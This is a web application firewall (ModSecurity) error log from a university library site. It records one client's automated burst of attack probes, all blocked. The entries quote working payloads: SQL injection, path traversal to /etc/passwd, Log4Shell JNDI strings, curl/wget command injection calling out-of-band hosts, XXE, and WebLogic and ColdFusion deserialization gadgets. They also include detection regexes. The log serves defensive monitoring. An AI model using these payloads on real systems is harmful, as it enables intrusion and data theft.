[Tue Aug 29 11:31:35.377314 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pubid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:pubid: 4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/ebook/bookPerPub.php"] [unique_id "ZO10p8Co-f0AAAN@5GkAAAAO"]
[Tue Aug 29 11:31:36.393669 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:host:  cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/api/ping"] [unique_id "ZO10qMCo-f0AAANsATUAAAAD"]
[Tue Aug 29 11:31:36.394440 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-808}${:-319}.${hostName}.username.cjmn8l5jmimk2adbbnlgg1sz1egt7c5tj.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/j_security_check"] [unique_id "ZO10qMCo-f0AAAPah1EAAAAL"]
[Tue Aug 29 11:31:37.335609 2023] [:error] [pid 1062] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:discount_code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:discount_code: '  union select sleep(6) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO10qcCo-f0AAAQmR3oAAAAH"]
[Tue Aug 29 11:31:37.478911 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:username: dw1' or 1=1 #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/zms/admin/index.php"] [unique_id "ZO10qcCo-f0AAAPah1gAAAAL"]
[Tue Aug 29 11:31:38.298799 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ztd_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ztd_password: $(/bin/wget$IFShttp:/cjmn8l5jmimk2adbbnlgrnb1zd354sywc.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/Collector/nms/addModifyZTDProxy"] [unique_id "ZO10qsCo-f0AAAPah1kAAAAL"]
[Tue Aug 29 11:31:38.457411 2023] [:error] [pid 1062] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:day. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:day: 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/module/smartblog/archive"] [unique_id "ZO10qsCo-f0AAAQmR4MAAAAH"]
[Tue Aug 29 11:31:38.496198 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:username: ;`curl cjmn8l5jmimk2adbbnlgtceg7jdhy1qiq.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/login"] [unique_id "ZO10qsCo-f0AAAN@5HsAAAAO"]
[Tue Aug 29 11:31:39.414993 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:payload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22 ?><! found within ARGS:payload: <?xml version=\\x221.0\\x22 ?><!DOCTYPE a [ <!ENTITY % xxe SYSTEM \\x22http://cjmn8l5jmimk2adbbnlgew58d3ur85ouw.oast.site\\x22>%xxe;]>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/carbon/generic/save_artifact_ajaxprocessor.jsp"] [unique_id "ZO10q8Co-f0AAANsAUIAAAAD"]
[Tue Aug 29 11:31:40.383407 2023] [:error] [pid 1020] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "digilibfeb.unla.ac.id"] [uri "/Config/SaveUploadedHotspotLogoFile"] [unique_id "ZO10rMCo-f0AAAP8G0kAAAAV"]
[Tue Aug 29 11:31:41.595706 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at REQUEST_COOKIES:wpsc_guest_login_auth. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within REQUEST_COOKIES:wpsc_guest_login_auth: {\\x22email\\x22:\\x22' AND (SELECT 42 FROM (SELECT(SLEEP(6)))NNTu)-- cLmu\\x22}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO10rcCo-f0AAAPMmJ0AAAAY"]
[Tue Aug 29 11:31:43.335857 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:folder. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:folder: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10r8Co-f0AAAPDn8AAAAAP"]
[Tue Aug 29 11:31:44.319504 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "digilibfeb.unla.ac.id"] [uri "/soap.cgi"] [unique_id "ZO10sMCo-f0AAAPiBkoAAAAB"]
[Tue Aug 29 11:31:44.319574 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "digilibfeb.unla.ac.id"] [uri "/soap.cgi"] [unique_id "ZO10sMCo-f0AAAPiBkoAAAAB"]
[Tue Aug 29 11:31:44.327661 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:handle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  = ( found within ARGS:handle: com.tangosol.coherence.mvel2.sh.ShellSession(\\x22weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();\\x0d\\x0aweblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();\\x0d\\x0ajava.lang.reflect.Field field = adapter.getClass().getDeclaredField(\\x22connectionHandler\\x22);\\x0d\\x0afield.setAccessible(true);\\x0d\\x0aObject obj = field.get(adapter);\\x0d\\x0aweblogic.servlet.internal.ServletRequestImpl req = (weblog..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/console/css/%2e%2e%2fconsole.portal"] [unique_id "ZO10sMCo-f0AAAP@M2MAAAAZ"]
[Tue Aug 29 11:31:44.331930 2023] [:error] [pid 1027] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:meta_ids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:meta_ids: 1 AND (SELECT 3066 FROM (SELECT(SLEEP(6)))CEHy)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10sMCo-f0AAAQDFU8AAAAl"]
[Tue Aug 29 11:31:44.381984 2023] [:error] [pid 1029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:progressfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:progressfile: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/usc-e-shop/functions/progress-check.php"] [unique_id "ZO10sMCo-f0AAAQFcUIAAAAn"]
[Tue Aug 29 11:31:45.449238 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id: (SELECT 1337 FROM (SELECT(SLEEP(6)))MrMV)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10scCo-f0AAAP5mKUAAAAM"]
[Tue Aug 29 11:31:45.458053 2023] [:error] [pid 1020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:argumentCollection. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '/></ found within ARGS:argumentCollection: <wddxPacket version='1.0'><header/><data><struct type='xcom.sun.rowset.JdbcRowSetImplx'><var name='dataSourceName'><string>ldap://cjmn8l5jmimk2adbbnlg48bygo6tqo8bf.oast.site/rcrzfd</string></var><var name='autoCommit'><boolean value='true'/></var></struct></data></wddxPacket>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/CFIDE/adminapi/accessmanager.cfc"] [unique_id "ZO10scCo-f0AAAP8G1IAAAAV"]
[Tue Aug 29 11:31:46.360651 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10ssCo-f0AAAQOv3sAAAAw"]
[Tue Aug 29 11:31:47.425866 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:KEY_LENGTH. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x22..\\x5c found within ARGS:KEY_LENGTH: 1024 -providerclass Si -providerpath \\x22..\\x5cbin\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/RestAPI/Connection"] [unique_id "ZO10s8Co-f0AAAP5mKwAAAAM"]
[Tue Aug 29 11:31:47.444982 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10s8Co-f0AAAP5mK0AAAAM"]
[Tue Aug 29 11:31:49.312624 2023] [:error] [pid 1020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/confluence/pages/createpage-entervariables.action"] [unique_id "ZO10tcCo-f0AAAP8G1oAAAAV"]
[Tue Aug 29 11:31:50.321452 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/confluence/pages/createpage-entervariables.action"] [unique_id "ZO10tsCo-f0AAAPDn9MAAAAP"]
[Tue Aug 29 11:31:50.421019 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sgcgoogleanalytic. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)</ found within ARGS:sgcgoogleanalytic: <script>console.log(\\x22document.domain\\x22)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO10tsCo-f0AAAQMrwYAAAAu"]
[Tue Aug 29 11:31:50.477265 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Rule 7fe1c606a5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibfeb.unla.ac.id"] [uri "/\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\b\\xb7\\x06\\b;{curl,http:/cjmn8l5jmimk2adbbnlg6nyk9ycxoz3j6.oast.site+-H+'User-Agent:+LGgfDE'};\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\b\\xb7\\x06\\b;{curl,http:/cjmn8l5jmimk2adbbnlgg3d8zi53nn4sw.oast.site+-H+'User-Agent:+LGgfDE'};"] [unique_id "ZO10tsCo-f0AAAN@5JkAAAAO"]
[Tue Aug 29 11:31:51.323500 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Rule 7fe1c606a5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibfeb.unla.ac.id"] [uri "/\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbfd\\xb8\\x06\\b;{curl,http:/cjmn8l5jmimk2adbbnlgrmh4hu7mt188s.oast.site+-H+'User-Agent:+LGgfDE'};\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbfd\\xb8\\x06\\b;{curl,http:/cjmn8l5jmimk2adbbnlgcfme1tu4ud1bs.oast.site+-H+'User-Agent:+LGgfDE'};"] [unique_id "ZO10t8Co-f0AAANsAVoAAAAD"]
[Tue Aug 29 11:31:51.330406 2023] [:error] [pid 1045] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: No boundaries found in payload."] [severity "CRITICAL"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10t8Co-f0AAAQV4QcAAAA3"]
[Tue Aug 29 11:31:51.356194 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wiki/pages/createpage-entervariables.action"] [unique_id "ZO10t8Co-f0AAAN@5KAAAAAO"]
[Tue Aug 29 11:31:52.420010 2023] [:error] [pid 1040] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wiki/pages/createpage-entervariables.action"] [unique_id "ZO10uMCo-f0AAAQQynUAAAAy"]
[Tue Aug 29 11:31:53.335651 2023] [:error] [pid 1040] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO10ucCo-f0AAAQQyn8AAAAy"]
